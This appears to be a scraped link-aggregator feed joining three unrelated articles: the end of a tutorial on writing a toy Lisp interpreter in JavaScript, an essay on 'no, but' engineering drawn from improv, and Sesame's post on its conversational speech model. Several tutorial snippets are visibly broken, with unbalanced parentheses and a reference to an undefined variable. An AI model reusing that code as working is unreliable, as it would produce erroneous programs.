    Now we've got some recursion in the mix, we're getting somewhere. This function will evaluate every array it finds, no matter how deep into the structure.

    [alert, [prompt, "What is your name?"]]

    Syntax & Names

    So far, so good, but how would we do Maths?

    [+, 5, 5]

    Like it or not, this is definitely going to give you a syntax error.

    One of the genuine benefits of picking a language that already understands Lisp is that the simplicity of the syntax leaves an abundance of characters to use as identifier names. For instance, in Clojure + is just the name of a function that happens to be responsible for adding numbers.

    When we want to borrow these transcendental concepts in our syntax heavy languages, we have to do some extra work.

    function add(a, b) {
      return a + b;
    }
    
    [add, 5, 5] 

    This is elegant for sure, but there's scope for more mischief here. Try this instead.

    ['+', 5, 5] 

    Let's define some native functions.

    var native = {
      '+': function(a, b) {
        return a + b;
      },
      '-': function(a, b) {
        return a - b;
      }
    };
    
    [native['+'], 5, 5] 

    This ends up feeling verbose, but some tweaks can alleviate it. Pass your native object to eval as a second argument.

    function eval(expression, native) {
      
      var fnName = expression[0];
    
      
      var fn = typeof fnName === 'string' ? native[fnName] : fnName;
    
      
      var args = expression
        .slice(1)
        .map(function(arg) {
          
          if(arg instanceof Array) {
            return eval(arg, native);
          } else {
            return arg;
          }
        });
    
      
      return fn.apply(null, args);
    }
    
    ['+', 5, 5] 

    Hopefully, you're wondering why this doesn't feel like the zen of simplicity that is associated with Lisps. And you're right. It's not. But if you wanted simple, then you should ask yourself what on earth are you doing reading about implementing a makeshift lisp in an already confused programming language?

    This is a sandbox for us to do unreasonable things in. Missing out on these kinds of hacks would be a wasted opportunity. Go ahead and implement +, -, *, /, = and any other operators you think might be useful as native functions. We'll use them later on.

    Variables

    A language without variables would be difficult, so we'll implement them.

    function def(name, value) {
      window[name] = value;
    }
    
    [def, a, 5]

    Our def function takes a variable name and a value to assign to it, then it binds it onto the window object—which is the global scope in Javascript. However, there's a real elephant in the expression. We aren't responsible for resolving the values of variables within the expression. The Javascript implementation is going to do that for us.

    It will try to resolve the value of a. We haven't declared it, so it will throw an error. Or even worse, if we have declared it, but not initialised it, we'll end up with undefined as our name argument. Of course Javascript has an excellent way of dealing with this. Coerce undefined to a string, then use it as a key all the same (oh, Javascript...).

    Ah well. The obvious solution is to pass the name as a string instead.

    [def, 'a', 5]
    [alert, ['+', a, a]]

    Great, except it still doesn't work. The second expression is evaluated by the runtime before we get a chance to interpret the first. How did we solve this last time? Use strings instead.

    Scope

    [def, 'a', 5]
    [alert, ['+', 'a', 'a']]

    Now we have to try and resolve every string argument as a variable. We're also going to have do the same with functions, so that we can use variables as the first item in lists.

    Let's bite the bullet and introduce a simple scope, then have all strings refer to values within it. If a string doesn't refer to a value, then we'll just use it's raw value.

    Instead of accepting the native object as a second argument, accept a scope object instead. This way, we can pass our native object in as the root scope object and nothing will break.

    function eval(rawExpr, scope) {
    
      
      if(!(rawExpr instanceof Array)) {
        return rawExpr;
      }
    
      
      scope = scope || {};
    
      
      var expression = rawExpr.map(function(symbol) {
        if(symbol in scope) {
          return scope[symbol];
        } else {
          return symbol;
        }
      });
    
      
      var fn = expression[0];
    
      
      var args = expression
        .slice(1)
        .map(function(arg) {
          
          if(arg instanceof Array) {
            return eval(arg, scope);
          } else {
            return arg;
          }
        });
    
      
      
      return fn.apply(scope, args);
    }

    We used the first argument of .apply to expose the scope as this to each of our functions. We'll define a new, native version of def to show this in action (excuse the pun).

    var native = {
      def: function(name, value) {
        return this[name] = value;
      },
      print: console.log.bind(console)
    };

    We can also add a print method, just in case you were fed up of using alert. Let's test that out.

    ['print', ['def', 'a', 5]]

    It may not be the most beautiful code you've ever seen, but it works.

    Special Forms

    We've got evaluable expressions, but we don't have any way to control them. There's no sense of a conditional statement, a function, or even a way to execute multiple expressions at once.

    Our eval function currently tries to interpret every expression it sees. We'll have to denote that some functions are special forms that will handle the evaluation of their own arguments.

    function SpecialForm(fn) {
      fn.__isSpecialForm__ = true;
      return fn;
    }

    Then we'll tweak the eval function, to prevent it from evaluating expressions that are arguments to a special form.

    
    
    var fn = expression[0];
    
    
    var args = expression
      .slice(1)
      .map(function(arg) {
        
        if(arg instanceof Array && (!fn.__isSpecialForm__) {
          return eval(arg, scope);
        } else {
          return arg;
        }
      });
    

    Do

    Let's test out our new special forms and implement do. It evaluates all of its arguments, which allows us to evaluate multiple expressions in series.

    In traditional Lisp:

    (do
      (print "Hello")
      (print "World!"))

    We'll add it as a new native function.

    var native = {
      'do': SpecialForm(function() {
        var exprs = [].slice.call(arguments);
        return exprs.reduce(function(_, expr) {
          return eval(expr, this);
        }.bind(this), null);
      }
    };

    We can also do a nice trick with reduce to make sure that the value of the last expression is returned.

    Lets translate the example above to our new syntax and watch it run.

    ['do',
      ['print', 'Hello'],
      ['print', 'World!']]
    
    
    

    If/Else

    What good is a programming language without conditionals? The next challenge is implementing if statements. However—with our new special forms—it should be trivial.

    var native = {
      if: SpecialForm(function(condition, success, failure) {
        var passed = eval(condition, native, this);
        return eval(passed ? success : failure, native, this);
      }
    };

    That's it. if/else in 3 lines of code.

    ['if', ['=', 3, 3],
      ['print', 'true'],
      ['print', 'false']]
    
    

    If this is your first time implementing a Lisp, this should be a special moment. You have implemented conditional control flow as data.

    Functions

    Functions are the last hurdle between here and having a language that can actually do things. However, it's quite a hurdle.

    Here's what they look like in more conventional Lisps.

    (def shout
      (fn [name planet]
        (print planet name)))

    This is actually an anonymous function being bound to a local variable with def. We already have an implementation of def so all we need now is an implementation for fn.

    Let's break down the arguments to fn.

    The first one is an list of arguments and the second one is the expression (or function body).

    var native = {
      fn: SpecialForm(function(defArgs, expr) {
        return function() {
          var callArgs = arguments;
    
          
          var childScope = Object.create(this);
    
          
          
          defArgs.forEach(function(argName, index) {
            childScope[argName] = callArgs[index];
          });
    
          
          return eval(expr, code, childScope);
        }
      })
    };

    There it is. Dynamic binding into a lexical scope. Can we just take a moment to agree that prototypal inheritance rocks, too?

    ['do',
      ['def', 'shout',
        ['fn', ['planet', 'greeting'],
          ['print', 'greeting', 'planet']]],
      ['shout', 'hello', 'world']]
    
    

    This could definitely be less verbose, so we can take a hint from some other Lisps and create defn too.

    var native = {
      defn: SpecialForm(function(name, args, expr) {
        var fn = native.fn.call(this, args, expr);
        return native.def.call(this, name, fn);
      })
    };

    We simply tie together our existing implementation of def with fn.

    ['do',
      ['defn', 'shout', ['planet', 'greeting'],
        ['print', 'greeting', 'planet']],
      ['shout', 'hello', 'world']]
    
    

    Much better.

    Once a language has functions, the sky is the limit.

    ["defn", "fib", ["n"],
      ["if", [">", "n", 1],
        ["+",
          ["fib", ["-", "n", 1]],
          ["fib", ["-", "n", 2]]],
        1]]

    No self-respecting functional programming demo comes without a horribly inefficient demo of a non-memoized recursive Fibonnaci implementation. This one is no exception.

    ["print", ["fib", 8]]
    

    Considerations

    You might have noticed that our code is completely JSON compliant. We use primitives and lists. This means we can actually use JSON as source files for our language.

    What? You mean we can embed a language with first class functions inside JSON? Yeah, we can.

    Our language is still very short on the ground in terms of a standard library. We haven't really considered data structures, namespaces, exceptions, debugging or macros either.

    Conclusion

    I'm putting together an implementation of this Javascript Lisp, along with a REPL and a growing set of native functions on Github. Feel free to use it as a reference. It's important to remember is that this is a toy—a sandbox for learning. It's not meant to be taken seriously and it certainly shouldn't be used in any real systems. It's inefficient and insecure.

    Here's a short video of the REPL in action.

    More than anything else, implementing a programming language—no matter how small or strange—is a great way to learn about the language you implement it in. Language design in general is a fairly eye-opening experience and hopefully this has also helped open your eyes to the simple, yet powerful nature of Lisps.

    I'll revisit this language again in the future, to talk through the process of implementing macros, then we'll move as much native code as possible inside the language.

    Now open your editor and do this again in another language, then tweet me when you're done!

    ]]>
    https://danthedev.com/lisp-in-your-language hacker-news-small-sites-43222017 Sat, 01 Mar 2025 18:23:37 GMT
    <![CDATA[The "No, but" Engineer]]> thread link) | @herbertl
    March 1, 2025 | https://www.scottsmitelli.com/articles/no-but-engineer/ | archive.org

    When I was about 21 years old, I signed up for a one-day improv workshop in New York City.

    The extent of most people’s knowledge of improvisational comedy probably begins and ends with Whose Line Is It Anyway?, a television show that first premiered in the UK during the late 1980s and, as of this writing, recently broadcast new episodes within the last few months on The CW. During the show’s original run in the US, then-current host Drew Carey was described as a man who “pretends to laugh at guys pretending to improvise.” Jimmy Kimmel, The N.Y. Friars Club Roast of Hugh Hefner (2001) Whether that allegation was fair or not, I can’t say. But I can say that, if you are familiar with the show, you would also be familiar with the way our workshop was run.

    Improv isn’t just a collection of screaming jackasses; there are actually a number of rules that each performer should abide by to make the scene work well. Most of these rules boil down to two things: 1) always add new information, and 2) always accept and respect the information added by others in the scene.

    If one performer exclaims something like:

    “Wow, I can’t believe I made it to a major league baseball stadium! Hey, it’s all-star hitter Neil Blatz!”

    The worst thing the next performer could do is say:

    “No, this is a pet store and you just let all the hamsters out!”

    That’s selfish. It disrespects the premise and the other performers in the scene who worked to put it together. It destroys the momentum of the entire show and kills the audience’s enthusiasm. It basically wrecks the whole afternoon.

    The shortest way to express the rules? “Yes, and…”

    In the workshop we did, I was paired up with another first-timer named Remmy. I think that’s how his name was spelled. With the help of a suggestion from the rest of the group and a bit of yes-anding between the two of us, we arrived in a scene where I was a stern representative from the company’s HR department and he was an employee coming to my office to discuss the latest complaint lodged by his coworkers.

    As the scene progressed, we arrived at the premise that he was way, way too into the Magic: The Gathering card game and would talk incessantly about it to the point where it was harming productivity. I responded yes, and this has been causing a tremendous amount of paperwork for everyone in HR. He then turned his attention to me, where he began prattling off such extremely specific details about the cards and their relative capabilities that I was quite sure he was bringing a deeply authentic part of his actual self into the character. I knew virtually nothing about the game, but I responded to each of his details with increasingly absurd commentary of my own. Yes, and then Joe barricaded himself in the supply closet. Yes, and then half the office quit. Yes, and now I’m the only member of HR that hasn’t run away screaming; it has been a tremendous amount of paperwork.

    From the front row of the audience, the workshop leader held three fingers in the air. This was our signal that we had about 30 seconds if we wanted to try to wrap the scene up.

    Remmy was still going on about all the different cards, so I slowly turned away, climbed up on the chair, and mimed tying a noose around my neck. I closed my eyes, stepped off the chair, then stood swaying with my tongue stuck out. If you had told me prior to that day that I would get up in front of a room full of strangers, act out an imaginary suicide by hanging, and that I would be rewarded with laughter for doing so, I’m not so sure I would’ve believed you.

    I felt a tap on my shoulder. I turned and opened one eye to see Remmy, who had stopped talking. He extended an invisible stack of something, then delivered the final line of the scene: “Don’t forget your paperwork.”

    Remmy, if you’re out there reading this, thanks for being such a solid scene partner.

    The rules of improv work quite well when you’re making up a comedy scene. They permit each participant the freedom to propose something potentially ludicrous, but with the guaranteed assurance that their contribution will not be rejected. It’s a remarkably safe and supportive environment, and actually one of the least frightening forms of acting that an anxious or shy person can dip their toes into. The yes-and framework lays the groundwork for completely absurd and potentially hilarious situations to blossom. This is exactly what you want in a comedy scene.

    This is precisely the opposite of what you want on your engineering team.

    Guilty as charged

    People go into tech for a variety of reasons. Some see the allure of easy money, others feel as though it may be one of the lazier paths through life. But for a number of us, the motivation is a desire to be useful. Something inside compels us to always look for problems to solve, processes to improve, or simply things to do. The word “useful” is a very deliberate choice; it does not automatically imply that the work is helpful. Perhaps you are the best baker in your social group. That’s an extremely useful skill in the abstract. But when you’re all trapped together inside a stalled elevator car, it is not very helpful. It can be very easy to fall into a trap where it feels like you’re wasting a lifetime of study and practice by not using your knowledge and skills at every possible opportunity. It’s an extremely hard switch to turn off.

    Most teams of any appreciable size have a couple of members with this kind of energy. When harnessed well and directed effectively, they can be extremely self-sufficient and productive. They’ll soldier through the thorniest problems to find answers. They will move mountains if given the opportunity. However, get a couple of them together in a conference room without appropriate supervision and they can yes-and each other to unimaginably unhinged designs.

    This has a tendency to react with another rather unfortunate background element in many workplaces: boredom. Whether we like to admit it or not, a whole bunch of us spend way too many of our days working below our abilities. We have the capacity to calculate rocket trajectories, tackle CPU pipeline hazards, improve open-source libraries that run on hundreds of millions of systems… yet we’re just sitting here bolting another authorization check onto some miserable CRUD app, or trying to shave a tenth of a second off of some ad’s load time. We get bored, then we get antsy, then we go looking for problems to solutionize, then we over-engineer. Pain follows shortly thereafter.

    In some ways, the industry actually encourages this. For every piece of software written for fun and released in the spirit of fostering goodwill, there are dozens of other essentially-identical components written as works-for-hire that have been jealously guarded by the companies that commissioned them. Think of how many different e-commerce checkout pages you’ve interacted with, and how they’re all basically the same yet subtly different, like little crappy snowflakes that are each uniquely awful in their own special way. Think of how many account creation and password reset flows you’ve dealt with, how many person-hours have been spent reimplementing duplicate after duplicate of substantially the same thing. At this point it really should be classified as pointless busywork.

    But if it keeps us from getting too much free time to conjure up something even worse, hell, maybe it’s actually the better use of time.

    No, but…

    If the intention of “yes, and” is to kite a given situation to newer and increasingly absurd heights, then “no, but” implies the exact opposite: a default position of rejecting the proposal while simultaneously offering an acceptable substitute. Sort of like the mean mother in the “We Have Food at Home” meme. In a room full of yes-ands, a single well deployed no-but can bring the conversation back down to reality. It is sometimes difficult and often unrewarding, but an incredibly powerful skill to hone.

    It should go without saying that the “but” is just as important as the “no.” You don’t want to earn the reputation of being an unsupportive jerk who shoots everything down for no good reason. The Bastard Operator from Hell is not a role model, is what I’m saying. The “no” always comes from a place of rationality, while the “but” serves to share that perspective with others. The heart of the no-but philosophy is a genuine belief that the solution being discussed is not the correct one, paired with an alternative option that is either simpler, cheaper, faster to implement, or superior in some other meaningful way.

    Both halves of this response are difficult. The “no,” if deployed indelicately, can lead to unpleasant responses from those who feel deeply invested in the idea or approach they were proposing. Sometimes we put too much of ourselves into our work, and having ideas rejected can easily feel like a personal rejection as well. Instead, a simple redirection in the form of “what about…” or “didn’t we already have…” or “wouldn’t it be more effective to…” can allow the no-but engineer to elide the “no” part entirely. There are dozens upon dozens of ways to phrase it, and doing it well can defuse a situation before it starts.

    As for the “but,” that requires hard work over a long time. There’s no special life hack you can employ to accelerate the process. It takes a solid understanding of the problem space, any off-the-shelf solutions that may be applicable to the discussion, some degree of practical experience in using those existing solutions, and a reasonably clear insight into the specifics of the organization and what it values. If some other team has tackled this issue, what did they choose and how did it work for them?

    Together, the no-but approach serves to deter that immediate knee-jerk response of “I see a problem, time to immediately roll up my sleeves and go, go, go!” The no-but approach is very much “stop, look around, think.” In any given moment, faced with some new and exciting perceived problem, it’s incredibly easy for a yes-and engineer to forget to do that.

    An apparently rare breed

    One would think that an employee with seniority—either a literal senior engineer, or principal/lead/staff level—would exhibit these traits. In my experience this is not automatically true. I don’t have a ready explanation for why this is. Perhaps it’s not something that management looks for during the promotion cycle. Maybe it’s because this industry has a habit of slapping the “senior” label onto staff who are barely three years out of college. Yeah yeah, “meritocracy” and all that. You’re telling me that a 26 year old has met all the qualifications to shoot to the very top of the individual contributor ladder at this organization? That seems, I don’t know, preposterously quick. Fact is, engineers at every level seem to be more than willing to jump headlong into these tangled messes of their own making.

    An effective no-but engineer possesses a healthy mix of experience and insight, paired with a probably-unhealthy mix of skepticism and distrust. Those are hard things to identify sometimes, and they don’t really lend themselves to any sort of curriculum for self-study. There are some traits, though. Perhaps they can help tune to the no-but wavelength.

    The no-but engineer:

    Is not a dickhead. If there is one single piece of advice I wish I could give to everybody at every level, I would simply advise them to not be dickheads to each other. Nobody needs that toxicity in their life; it is counterproductive at best and can absolutely trash team morale. If it really permeates the culture, everybody ends up being a dickhead to everybody else and the whole place goes to hell. Don’t be a dickhead. Don’t work with or for dickheads either, if you can avoid it.

    Is tactful. It’s easy to blurt out whatever might pop into your head, but it’s important to always be cognizant of how that expression will be received by those around you. Sometimes the way something is said is more important than the actual substance of the message. And sometimes—not always, but sometimes—the best course of action is simply to say nothing at all.

    Is well aware of the broader organization, its needs, strengths, and bottlenecks. It can be easy to think of your team and its direct stakeholders as your entire known universe, but you all exist within a larger organization that has objectives and problems. The no-but engineer is well-poised to notice cases where the team seems to be moving in a direction that doesn’t help reach an organizational goal. Further, the no-but engineer is at least somewhat aware of the expertise and institutional knowledge available from other teams. There’s a good chance that somebody on the same payroll has something to offer.

    Knows what’s going on under the hood. Just as important as understanding the organization as a whole, it’s also very important that the no-but engineer has a deep understanding of the technologies and practices used by the team. This can help cut through the fog of higher-level arguments and come to the realization that it’s all just different ways of pumping the same bytes through the same TCP socket. They are well aware of what’s in the language’s standard library. They know which third-party packages they would reach for when necessary. They know what kinds of tasks to avoid touching with ten-foot poles.

    Has seen some things. Wide-ranging experience gives a substantial amount of perspective. It becomes easier to see patterns as you live through more and more situations. If the goal is to be able to identify instances where history is repeating itself, it would be a good idea to be well versed in those historical events. This also helps build empathy, and the ability to step into a different individual’s shoes and perceive the situation as they do. Sometimes it’s helpful to simply think back and recall times when you yes-anded yourself into something regrettable, how that felt in the moment, and what you wish somebody had said to you at the time. Sometimes a mildly traumatic experience outside of a work environment can help with this kind of perspective. I once had a fluorescent tube burst in my face. Now I’m not afraid of CMake. True story.

    Is pragmatic. The no-but engineer accepts that sometimes it’s better to copy/paste a 50-line function rather than set up another goddamn private Git repository with another goddamn deployment key that we’ll have to keep remembering to rotate for-goddamn-ever.

    Does not seek glory, and accepts responsibility for failures. Part of this ties nicely into not being a dickhead. This is not the kind of work that should be undertaken by those looking for a way to stroke their own ego. When successes come, the praise goes to the team. When things go south and fingers start pointing, the no-but engineer doesn’t try to argue, deflect, or gaslight anybody into thinking it was somebody else’s fault. If they screwed up, they screwed up. Learn and move forward. It should also go without saying, but “I told you so” is never anything that anybody wants to hear after a failure.

    Hears what others mean, not just what they say. This is sort of the inverse of the tactfulness trait. Sometimes requesters don’t know what they want. Sometimes they know what they want but they don’t know how to phrase it. Perhaps they’re afraid of flat-out asking for something, so they dance around it. The no-but engineer knows how to set aside the letter of the request while looking for the spirit of it. Restating this interpretation back to the requester thus frees them from the responsibility of having to have done that difficult bit themselves. Lightly pushing back on a complicated thing and offering a more manageable substitute might save a huge amount of not-that-necessary-in-hindsight extra effort.

    Is absolutely not a “rockstar” in terms of productivity. The no-but engineer would probably confess that they don’t have any idea what they’re doing half the time. Of course this is probably not objectively true. What’s likely actually happening is, the no-but engineer has a long list of topics they’re quite sure they don’t know enough about. It’s good to be aware of your own limitations, and impostor syndrome is a real devil sometimes. The best benefit the no-but engineer could bring would be to convince people (including themselves) to not write any code if they can avoid it. Code is a liability. Eradicate it whenever you can.

    Embodies the spirit of “The Gambler” from that Kenny Rogers song. As hokey as the sentiment might sound, there is a certain wisdom in realizing that the outcome of so many situations depends on how we play our hands moment to moment. Know when to speak up, when to accept the impossibility of changing a situation, and when to just get the hell out of there. The gambler in that song is a role model of sorts, although for your own good health you probably want to ignore the bit about getting drunk and dying on a train.

    I will now take no questions

    You might very well be thinking, wait, why do we need such a strong contrarian voice here? Shouldn’t most professional engineers with some amount of experience have enough of a sense of restraint to prevent these issues? Failing that, shouldn’t part of management’s responsibilities involve ensuring that things don’t go too far off the rails? Why can’t we simply extrapolate from the corporate values set forth by senior leadership to stay aligned at every level?

    You would think that, and yet here we are.

    It’s not that you work alongside childish fools. Probably. It’s not that everybody is jockeying for the latitude to build some preposterous pet project using a hot new technology that they can sprinkle over their résumé in the hopes of getting some other job at a company that pays better. Probably. It’s not that management hires warm bodies to do nothing of value all day and none of it matters. Probably. For the most part it really just seems like a group of well-intentioned but slightly bored engineers have goaded each other into following a less than ideal but slightly more interesting path through their day-to-day work. Because if that isn’t the reason, then what are we all even doing here?

    It really does seem as though every team can use no-but engineers to some extent. Even teams that already have one, that person could always use another set of eyes and ears. I believe that anybody who wants to become one, can become one. It takes time and effort, you’ll have to find ways to make it rewarding, and it can also drive you crazy if your organization doesn’t value that way of thinking. But you know what? Somebody else out there does, and they would be lucky to have a no-but engineer like you.

    Oh, and do improv if you get the chance. It’s a blast.

    « Back to Articles
    ]]>
    https://www.scottsmitelli.com/articles/no-but-engineer/ hacker-news-small-sites-43221951 Sat, 01 Mar 2025 18:17:59 GMT
    <![CDATA[Crossing the uncanny valley of conversational voice]]> thread link) | @be7a
    March 1, 2025 | https://www.sesame.com/research/crossing_the_uncanny_valley_of_voice | archive.org

    February 27, 2025

    Brendan Iribe, Ankit Kumar, and the Sesame team

    How do we know when someone truly understands us? It is rarely just our words—it is in the subtleties of voice: the rising excitement, the thoughtful pause, the warm reassurance.

    Voice is our most intimate medium as humans, carrying layers of meaning through countless variations in tone, pitch, rhythm, and emotion.

    Today’s digital voice assistants lack essential qualities to make them truly useful. Without unlocking the full power of voice, they cannot hope to effectively collaborate with us. A personal assistant who speaks only in a neutral tone has difficulty finding a permanent place in our daily lives after the initial novelty wears off.

    Over time this emotional flatness becomes more than just disappointing—it becomes exhausting.

    Achieving voice presence

    At Sesame, our goal is to achieve “voice presence”—the magical quality that makes spoken interactions feel real, understood, and valued. We are creating conversational partners that do not just process requests; they engage in genuine dialogue that builds confidence and trust over time. In doing so, we hope to realize the untapped potential of voice as the ultimate interface for instruction and understanding.

    Key components

    • Emotional intelligence: reading and responding to emotional contexts.
    • Conversational dynamics: natural timing, pauses, interruptions and emphasis.
    • Contextual awareness: adjusting tone and style to match the situation.
    • Consistent personality: maintaining a coherent, reliable and appropriate presence.

    We’re not there yet

    Building a digital companion with voice presence is not easy, but we are making steady progress on multiple fronts, including personality, memory, expressivity and appropriateness. This demo is a showcase of some of our work in conversational speech generation. The companions shown here have been optimized for friendliness and expressivity to illustrate the potential of our approach.

    Conversational voice demo

    1. Microphone permission is required. 2. Calls are recorded for quality review but not used for ML training and are deleted within 30 days. 3. By using this demo, you are agreeing to our Terms of Use and Privacy Policy. 4. We recommend using Chrome (Audio quality may be degraded in iOS/Safari 17.5).

    Technical post

    Authors

    Johan Schalkwyk, Ankit Kumar, Dan Lyth, Sefik Emre Eskimez, Zack Hodari, Cinjon Resnick, Ramon Sanabria, Raven Jiang

    To create AI companions that feel genuinely interactive, speech generation must go beyond producing high-quality audio—it must understand and adapt to context in real time. Traditional text-to-speech (TTS) models generate spoken output directly from text but lack the contextual awareness needed for natural conversations. Even though recent models produce highly human-like speech, they struggle with the one-to-many problem: there are countless valid ways to speak a sentence, but only some fit a given setting. Without additional context—including tone, rhythm, and history of the conversation—models lack the information to choose the best option. Capturing these nuances requires reasoning across multiple aspects of language and prosody.

    To address this, we introduce the Conversational Speech Model (CSM), which frames the problem as an end-to-end multimodal learning task using transformers. It leverages the history of the conversation to produce more natural and coherent speech. There are two key takeaways from our work. The first is that CSM operates as a

    single-stage model, thereby improving efficiency and expressivity. The second is our

    evaluation suite, which is necessary for evaluating progress on contextual capabilities and addresses the fact that common public evaluations are saturated.

    Background

    One approach to modeling audio with transformers is to convert continuous waveforms into discrete audio token sequences using tokenizers. Most contemporary approaches ([1], [2]) rely on two types of audio tokens:

    1. Semantic tokens: Compact speaker-invariant representations of semantic and phonetic features. Their compressed nature enables them to capture key speech characteristics at the cost of high-fidelity representation.
    2. Acoustic tokens: Encodings of fine-grained acoustic details that enable high-fidelity audio reconstruction. These tokens are often generated using Residual Vector Quantization (RVQ) [2]. In contrast to semantic tokens, acoustic tokens retain natural speech characteristics like speaker-specific identity and timbre.

    A common strategy first models semantic tokens and then generates audio using RVQ or diffusion-based methods. Decoupling these steps allows for a more structured approach to speech synthesis—the semantic tokens provide a compact, speaker-invariant representation that captures high-level linguistic and prosodic information, while the second-stage reconstructs the fine-grained acoustic details needed for high-fidelity speech. However, this approach has a critical limitation; semantic tokens are a bottleneck that must fully capture prosody, but ensuring this during training is challenging.

    RVQ-based methods introduce their own set of challenges. Models must account for the sequential dependency between codebooks in a frame. One method, the delay pattern (figure below) [3], shifts higher codebooks progressively to condition predictions on lower codebooks within the same frame. A key limitation of this approach is that the time-to-first-audio scales poorly because an RVQ tokenizer with N codebooks requires N backbone steps before decoding the first audio chunk. While suitable for offline applications like audiobooks, this delay is problematic in a real-time scenario.

    Example of delayed pattern generation in an RVQ tokenizer with 4 codebooks

    Conversational Speech Model

    CSM is a multimodal, text and speech model that operates directly on RVQ tokens. Inspired by the RQ-Transformer [4], we use two autoregressive transformers. Different from the approach in [5], we split the transformers at the zeroth codebook. The first multimodal backbone processes interleaved text and audio to model the zeroth codebook. The second audio decoder uses a distinct linear head for each codebook and models the remaining N – 1 codebooks to reconstruct speech from the backbone’s representations. The decoder is significantly smaller than the backbone, enabling low-latency generation while keeping the model end-to-end.

    CSM model inference process. Text (T) and audio (A) tokens are interleaved and fed sequentially into the Backbone, which predicts the zeroth level of the codebook. The Decoder then samples levels 1 through N – 1 conditioned on the predicted zeroth level. The reconstructed audio token (A) is then autoregressively fed back into the Backbone for the next step, continuing until the audio EOT symbol is emitted. This process begins again on the next inference request, with the interim audio (such as a user utterance) being represented by interleaved audio and text transcription tokens.

    Both transformers are variants of the Llama architecture. Text tokens are generated via a Llama tokenizer [6], while audio is processed using Mimi, a split-RVQ tokenizer, producing one semantic codebook and N – 1 acoustic codebooks per frame at 12.5 Hz. [5] Training samples are structured as alternating interleaved patterns of text and audio, with speaker identity encoded directly in the text representation.

    Compute amortization

    This design introduces significant infrastructure challenges during training. The audio decoder processes an effective batch size of B × S and N codebooks autoregressively, where B is the original batch size, S is the sequence length, and N is the number of RVQ codebook levels. This high memory burden even with a small model slows down training, limits model scaling, and hinders rapid experimentation, all of which are crucial for performance.

    To address these challenges, we use a compute amortization scheme that alleviates the memory bottleneck while preserving the fidelity of the full RVQ codebooks. The audio decoder is trained on only a random 1/16 subset of the audio frames, while the zeroth codebook is trained on every frame. We observe no perceivable difference in audio decoder losses during training when using this approach.

    Amortized training process. The backbone transformer models the zeroth level across all frames (highlighted in blue), while the decoder predicts the remaining N – 31 levels, but only for a random 1/16th of the frames (highlighted in green). The top section highlights the specific frames modeled by the decoder for which it receives loss.

    Experiments

    Dataset: We use a large dataset of publicly available audio, which we transcribe, diarize, and segment. After filtering, the dataset consists of approximately one million hours of predominantly English audio.

    Model Sizes: We trained three model sizes, delineated by the backbone and decoder sizes:

    • Tiny: 1B backbone, 100M decoder
    • Small: 3B backbone, 250M decoder
    • Medium: 8B backbone, 300M decoder

    Each model was trained with a 2048 sequence length (~2 minutes of audio) over five epochs.

    Samples

    Paralinguistics

    Sentences from Base TTS

    Foreign words

    Sentences from Base TTS

    Contextual expressivity

    Samples from Expresso, continuation after chime

    Pronunciation correction

    Pronunciation correction sentence is a recording, all other audio is generated.

    Conversations with multiple speakers

    Single generation using audio prompts from two speakers

    Evaluation

    Our evaluation suite measures model performance across four key aspects: faithfulness to text, context utilization, prosody, and latency. We report both objective and subjective metrics—objective benchmarks include word error rate and novel tests like homograph disambiguation, while subjective evaluation relies on a Comparative Mean Opinion Score (CMOS) human study using the Expresso dataset.

    Objective metrics

    Traditional benchmarks, such as word error rate (WER) and speaker similarity (SIM), have become saturated—modern models, including CSM, now achieve near-human performance on these metrics.

    Objective metric results for Word Error Rate (top) and Speaker Similarity (bottom) tests, showing the metrics are saturated (matching human performance).

    To better assess pronunciation and contextual understanding, we introduce a new set of phonetic transcription-based benchmarks.

    • Text understanding through Homograph Disambiguation: Evaluates whether the model correctly pronounced different words with the same orthography (e.g., “lead” /lɛd/ as in “metal” vs. “lead” /liːd/ as in “to guide”).
    • Audio understanding through Pronunciation Continuation Consistency: Evaluates whether the model maintains pronunciation consistency of a specific word with multiple pronunciation variants in multi-turn speech. One example is “route” (/raʊt/ or /ruːt/), which can vary based on region of the speaker and context.

    Objective metric results for Homograph Disambiguation (left) and Pronunciation Consistency (right) tests, showing the accuracy percentage for each model’s correct pronunciation. Play.ht, Elevenlabs, and OpenAI generations were made with default settings and voices from their respective API documentation.

    The graph above compares objective metric results across three model sizes. For Homograph accuracy we generated 200 speech samples covering 5 distinct homographs—lead, bass, tear, wound, row—with 2 variants for each and evaluated pronunciation consistency using wav2vec2-lv-60-espeak-cv-ft. For Pronunciation Consistency we generated 200 speech samples covering 10 distinct words that have common pronunciation variants—aunt, data, envelope, mobile, route, vase, either, adult, often, caramel.

    In general, we observe that performance improves with larger models, supporting our hypothesis that scaling enhances the synthesis of more realistic speech.

    Subjective metrics

    We conducted two Comparative Mean Opinion Score (CMOS) studies using the Expresso dataset to assess the naturalness and prosodic appropriateness of generated speech for CSM-Medium. Human evaluators were presented with pairs of audio samples—one generated by the model and the other a ground-truth human recording. Listeners rated the generated sample on a 7-point preference scale relative to the reference. Expresso’s diverse expressive TTS samples, including emotional and prosodic variations, make it a strong benchmark for evaluating appropriateness to context.

    In the first CMOS study we presented the generated and human audio samples with no context and asked listeners to “choose which rendition feels more like human speech.” In the second CMOS study we also provide the previous 90 seconds of audio and text context, and ask the listeners to “choose which rendition feels like a more appropriate continuation of the conversation.” Eighty people were paid to participate in the evaluation and rated on average 15 examples each.

    Subjective evaluation results on the Expresso dataset. No context: listeners chose “which rendition feels more like human speech” without knowledge of the context. Context: listeners chose “which rendition feels like a more appropriate continuation of the conversation” with audio and text context. 50:50 win–loss ratio suggests that listeners have no clear preference.

    The graph above shows the win-rate of ground-truth human recordings vs CSM-generated speech samples for both studies. Without conversational context (top), human evaluators show no clear preference between generated and real speech, suggesting that naturalness is saturated. However, when context is included (bottom), evaluators consistently favor the original recordings. These findings suggest a noticeable gap remains between generated and human prosody in conversational speech generation.

    Open-sourcing our work

    We believe that advancing conversational AI should be a collaborative effort. To that end, we’re committed to open-sourcing key components of our research, enabling the community to experiment, build upon, and improve our approach. Our models will be available under an Apache 2.0 license.

    Limitations and future work

    CSM is currently trained on primarily English data; some multilingual ability emerges due to dataset contamination, but it does not perform well yet. It also does not take advantage of the information present in the weights of pre-trained language models.

    In the coming months, we intend to scale up model size, increase dataset volume, and expand language support to over 20 languages. We also plan to explore ways to utilize pre-trained language models, working towards large multimodal models that have deep knowledge of both speech and text.

